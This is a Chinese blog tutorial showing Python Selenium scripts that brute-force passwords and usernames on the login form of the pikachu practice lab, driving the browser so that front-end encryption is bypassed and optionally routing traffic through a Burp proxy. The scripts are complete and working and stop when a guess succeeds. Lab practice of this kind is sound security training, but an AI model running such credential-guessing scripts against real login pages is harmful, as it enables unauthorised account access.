Selenium绕过前端加密

于 2023-08-21 16:02:41 发布
阅读量680 收藏 1
点赞数 1
分类专栏: python 渗透测试 文章标签: selenium
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/132410470
版权

目录

关于Selenium的语法,参见之前的笔记:上手Selenium

直接爆破(基于CSS)

一次访问

我们可以使用CSS表达式很容易的找到用户名、密码、登录按钮的位置,通过分析登录之后页面的变化,可以找到页面的返回结果,最终得到一个基础的脚本。
image.png

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'))
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)

# 清空并输入用户名
username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
username.clear()  # 清除输入框已有的字符串
username.send_keys('test')  # 输入新字符串
time.sleep(2)

# 清空并输入密码
password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
password.clear()  # 清除输入框已有的字符串
password.send_keys('123')  # 输入新字符串
time.sleep(2)

# 点击登录按钮
login = browser.find_element(By.CSS_SELECTOR, '.submit')
login.click()
time.sleep(2)

# 获取登录结果
result = browser.find_element(By.CSS_SELECTOR,'.bf_form_main > p')
print(result.get_attribute('outerHTML'))

# 关闭浏览器
browser.close()

# 结果
<p> username or password is not exists~</p>

抓包流量如下
会访问到一个js页面,最后POST请求登录网站,ua也是正常的
image.png

添加代理

第6~9行代码,添加bp代理

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

# 设置代理IP的地址和端口号,类型为 HTTP 代理
proxy_address = "127.0.0.1:8080"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--proxy-server=http://" + proxy_address)

# 浏览器驱动访问网站
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'), options=chrome_options)
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)

# 清空并输入用户名
username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
username.clear()  # 清除输入框已有的字符串
username.send_keys('test')  # 输入新字符串
time.sleep(2)

# 清空并输入密码
password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
password.clear()  # 清除输入框已有的字符串
password.send_keys('123')  # 输入新字符串
time.sleep(2)

# 点击登录按钮
login = browser.find_element(By.CSS_SELECTOR, '.submit')
login.click()
time.sleep(2)

# 获取登录结果
result = browser.find_element(By.CSS_SELECTOR, '.bf_form_main > p')
print(result.get_attribute('outerHTML'))

# 关闭浏览器
browser.close()

开始爆破

尝试固定用户名,爆破密码

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'))
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)


# 设置登录
def login(try_password):
    # 清空并输入用户名
    username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
    username.clear()  # 清除输入框已有的字符串
    username.send_keys('test')  # 输入新字符串
    print('尝试用户名:test')
    # time.sleep(2)

    # 清空并输入密码
    password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
    password.clear()  # 清除输入框已有的字符串
    password.send_keys(try_password)  # 输入新字符串
    print('尝试密码:' + try_password)
    # time.sleep(2)

    # 点击登录按钮
    login = browser.find_element(By.CSS_SELECTOR, '.submit')
    login.click()
    # time.sleep(2)

    # 获取登录结果
    result = browser.find_element(By.CSS_SELECTOR, '.bf_form_main > p')
    print('尝试结果:')
    print(result.get_attribute('outerHTML') + '\n')


with open(r'C:\Users\asuka\Desktop\FastPwds.txt', 'r', encoding='utf8') as file:
    f = file.readlines()
    for i in f:
        i = i.strip().replace('\n', '')
        login(i)

# 关闭浏览器
browser.close()

从流量中可以看到,在网站加载出来后,就开始反复爆破了。
image.png
感受一下实时爆破画面
123.gif
筛选出结果,使用负向后瞻:\<p\>\s(?!username),只要<p> "后面跟的不是username,就显示出来。
image.png

直接爆破(基于Xpath)

还是上面的pikachu靶场

爆破密码

  1. 使用xpath简化代码
  2. 判断是否登录成功,一旦成功,就终止爆破

image.png

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'))
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)

# 设置登录
def login(try_password):
    # 清空并输入用户名
    username = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[1]/span/input')
    username.clear()  # 清除输入框已有的字符串
    username.send_keys('test')  # 输入新字符串

    # 清空并输入密码,尝试登录
    password = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[2]/span/input')
    password.clear()  # 清除输入框已有的字符串
    password.send_keys(try_password + '\n')  # 输入新字符串
    print('尝试密码:' + try_password)

    # 获取登录结果
    result = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/p')
    print('尝试结果:')
    print(result.get_attribute('outerHTML') + '\n')

    # 判断是否登录成功
    if 'username or password is not exists' not in str(result.get_attribute('outerHTML')):
        print('破解成功,密码:'+try_password)
        exit()


with open(r'C:\Users\asuka\Desktop\FastPwds.txt', 'r', encoding='utf8') as file:
    f = file.readlines()
    for i in f:
        i = i.strip().replace('\n', '')
        login(i)

# 关闭浏览器
browser.close()

爆破用户名 & 添加代理

image.png
image.png

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service

# 设置代理IP的地址和端口号,类型为 HTTP 代理
proxy_address = "127.0.0.1:8080"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--proxy-server=http://" + proxy_address)

# 浏览器驱动访问网站
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'), options=chrome_options)
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')


# 设置登录
def login(try_username):
    # 清空并输入用户名
    username = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[1]/span/input')
    username.clear()  # 清除输入框已有的字符串
    username.send_keys(try_username)  # 输入新字符串
    print('尝试账号:' + try_username)

    # 清空并输入密码,尝试登录
    password = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[2]/span/input')
    password.clear()  # 清除输入框已有的字符串
    password.send_keys('123456' + '\n')  # 输入新字符串

    # 获取登录结果
    result = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/p')
    print('尝试结果:')
    print(result.get_attribute('outerHTML') + '\n')

    # 判断是否登录成功
    if 'username or password is not exists' not in str(result.get_attribute('outerHTML')):
        print('破解成功,:' + try_username + r'/123456')
        exit()


with open(r'C:\Users\asuka\Desktop\test.txt', 'r', encoding='utf8') as file:
    f = file.readlines()
    for i in f:
        i = i.strip().replace('\n', '')
        login(i)

# 关闭浏览器
browser.quit()
lainwith
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Selenium打开页面,出现弹窗需要登录账号密码,怎么解决?
Python进阶专栏《爬虫实战进阶》,《数据分析入门与实战》原创作者
08-27 5965
有时候,遇到需要登录账号密码的情况,无疑会想到用selenium。用selenium打开普通页面,其实都非常简单,但是你有没有遇到过这样的情况呢?
selenium规避检测,绕过检测
12-29
#进行js注入,绕过检测 #execute_cdp_cmd执行cdp命令(在浏览器开发者工具中执行相关指令,完成相关操作) #Page.addScriptToEvaluateOnNewDocument执行脚本 driver.execute_cdp_cmd("Page....
Python+selenium绕过前端js加密暴破登录
weixin_45605352的博客
08-02 1624
0x00 前言 有时在暴破登录框时,密码字段被加密了,不知道加密算法的话对暴破的进行会产生障碍,下面有几种解决方法. 分析前端 js 加密脚本,了解加密过程后用编程,\语言重写,将密码本加密后暴破. ...
Python selenium+cookie实现免密登陆
qq_37637818的博客
02-21 5442
今天爬取airbnb的租房数据时,遇到了登陆问题。自己动手解决了一下。 我们知道,http是无状态的,那么网页如何实现用户登陆注册功能呢?Session和Cookie就是为了满足这种需求出现的技术。 首先介绍一下Session和Cookie的概念。 在Web中Session对象存储特定用户会话所需的属性及配置信息。这样,当用户在应用程序的Web页之间跳转时,存储在Session对象中的变量将不会丢失,而是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web页时,如果该用户还没有会话,则Web
渗透测试——python脚本(selenium模块)暴力破解
weixin_54346898的博客
08-07 1148
渗透测试——python脚本(selenium模块)暴力破解
27. 处理网站验证码:处理网站登录验证码(selenium+破解工具)
Vec_Kun的博客
01-17 1712
当我们请求网页过于频繁时,或者进行登陆操作时,网页通常都会抛出人机验证,目的就是反爬,常见的有滑块验证、验证码、按顺序点击等形式...那么遇到这种情况,我们如何通过程序自动验证从而跳过人工操作实现全自动化呢?这就涉及到了一个新的知识:图像识别。我们可以通过建立数据集、训练数据集、生成模型等机器学习方法来实现识别验证码图片的功能,但它特别耗时耗力,效率还底下,还没有普适性...除非是有大量的请求要求在此域名下,就可以训练一波数据集,否则真的很浪费时间精力,没有必要。那么第二种方法应运而生:它就是。
Python Selenium Cookie 绕过验证码实现登录示例代码
09-20
在本文中,我们将深入探讨如何使用Selenium和Cookie来绕过验证码实现自动登录。这个方法对于那些需要频繁登录但又不想每次手动输入用户名和密码的场景特别有用。 首先,我们要理解整个流程的核心思路。在示例代码中...
selenium跳过webdriver检测并模拟登录淘宝
09-19
### Selenium跳过WebDriver检测并模拟登录淘宝的知识点详解 #### 一、背景介绍与问题分析 随着互联网技术的发展,各大网站对于用户行为的检测也越来越严格。对于自动化测试工具如Selenium来说,许多网站都设置了...
基于selenium技术,点击前端页码单选框代码示例
最新发布
06-28
python爬虫案例基于selenium技术,点击前端页码单选框代码示例
python使用selenium爬取js加密的网页
来自江南的你的博客
12-14 6071
python使用selenium爬取js加密的网页 我们经常使用Python从网站上爬取我们喜欢的图片,比如从煎蛋网爬取妹子图。现在虽然煎蛋网取消了“OOXX”栏目,但是至少把名字换成了随手拍,我今天想从该网站爬取妹子图,去发现没有办法 从爬取的代码中找到 ‘.jpg’ 关键词,这就尴尬了,我用审查元素看了一下,是有的,但是又看了一下网页的源代码,没有找到,实际上我们使用Python 的下面两句...
Selenium实战案例之爬取js加密数据
weixin_45688123的博客
07-26 2320
Selenium是一个用于Web应用程序测试的工具。Selenium测试直接运行在浏览器中,就像真正的用户在操作一样。支持的浏览器包括IE(7,8,9,10,11),MozillaFirefox,Safari,GoogleChrome,Opera,Edge等。这个工具的主要功能包括测试与浏览器的兼容性——测试应用程序看是否能够很好得工作在不同浏览器和操作系统之上。测试系统功能——创建回归测试检验软件功能和用户需求。支持自动录制动作和自动生成.Net、Java、Perl等不同语言的测试脚本。...
selenium复用cookie,避开扫码或者输入密码
Tester_muller的博客
09-28 449
说明:本篇博客基于selenium 4.1.0。
使用selenium进行密码破解(绕过账号密码JS加密
weixin_30443895的博客
04-26 800
经常碰到网站,账号密码通过js加密后进行提交。通过burp拦截抓到的账号密码是加密后的,所以无法通过burp instruder进行破解。只能模拟浏览器填写表单并点击登录按钮进行破解。于是想到了自动化web测试工具selenium,代码如下,测试效果还不错。 package com.example.tests; import java.util.regex.Pattern;import jav...
绕过前端加密进行爆破(附脚本)
Matthew
11-20 5049
在渗透的过程中,有时候会遇到密码在前端加密了,为我们爆破提高了难度。加密是js脚本自定义函数加密,burp里面的一些加密函数就满足不了我们的需求。如下所示,密码为admin123,加密的效果如下: 可以看到加密的函数主要是encode,所以每个密码都由自定义函数加密。最近在实战过程中get到一个new trick,利用相应的工具或者模块执行该 js 文件,拿到输出结果即可,可以使用 python 自
python实现——处理Excel表格(超详细)
热门推荐
LainWith的博客
10-12 24万+
目录xls和xlsx基本操作1:用openpyxl模块打开Excel文档,查看所有sheet表2.1:通过sheet名称获取表格2.2:获取活动表3.1:获取表格的尺寸4.1:获取单元格中的数据4.2:获取单元格的行、列、坐标5:获取区间内的数据获取指定区间的数据获取指定行列的数据按行、列获取值获取活动表的行列数操作创建新的excel修改单元格、excel另存为添加数据插入有效数据插入空行空列删除行、列移动指定区间的单元格(move_range)字母列号与数字列号之间的转换字体样式查看字体样式修改字体样式设
python实现——WORD转PDF(全自动化,支持doc、docx)
LainWith的博客
05-21 2万+
目录前言核心代码GIF演示终极版GIF演示 前言 在使用python提取所有word文件中的所有图片提到过doc转docx,其中提到过如果想转换为其他格式文件,需要在format文件名内修改,并用如下save as 参数 现在,就是利用这个参数,实现WORD转PDF 核心代码 利用如下代码进行格式互转(默认转换到与word文件同名路径下) from win32com import client # 转换doc为pdf def doc2pdf(fn): word = client.Dispatc
tshark在流量分析中的绝佳应用(超详细)
LainWith的博客
03-28 1万+
目录简介参数tshark与wireshark对比基本命令获取数据包摘要信息显示时间格式捕获过滤器捕获并保存数据包显示过滤器区分显示过滤器和读取过滤器一些好用的显示过滤器-e参数的应用HTTP中的应用案例mysql中的应用案例-z参数的应用专家信息:**-z expert**追踪流:**-z follow**-z http统计数据包信息统计会话统计出所有IP显示每个协议树的具体信息导出对象追踪流追踪tcp流/http流追踪流数量读取TCP流-纯16进制读取TCP流-16进制读取TCP流-ascii获取TCP流
python实现——文件操作(超详细)
LainWith的博客
10-12 9444
目录基本操作文件路径分离路径名和文件名分离文件名和文件后缀当前工作目录(os.getcwd、os.chdir)创建新文件夹(os.makedirs)查看文件夹目录和文件大小(os.path.getsize、os.listdir)路径有效性获取桌面路径文件读写读取文件使用read(),返回所有文本内容使用readline(),按行读取使用readlines(),把每行的内容添加到列表中使用readlines()读取文本文件写入文件使用write直接写使用writelines,以列表的方式写其他open() 方
python实现——流量分析
LainWith的博客
08-23 7565
前言 需要使用Scapy模块来编写流量嗅探工具,用到Scapy中的sniff()函数,该函数中比较重要的参数如下: iface:指定在哪个网络接口上抓包 count:表示要捕获的数据包的数量。默认值是0,表示不限制数量 filter:流量的过滤规则。使用伯格利包过滤的语法 prn:定义回调函数,通常使用lambda表达式来写回调函数。当符合filter的流量被捕获时,就会执行回调函数 关于filter: 表达式常用的有以下三种限定词: Type:类型限定词。例如host、net、port等,如果不指定
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值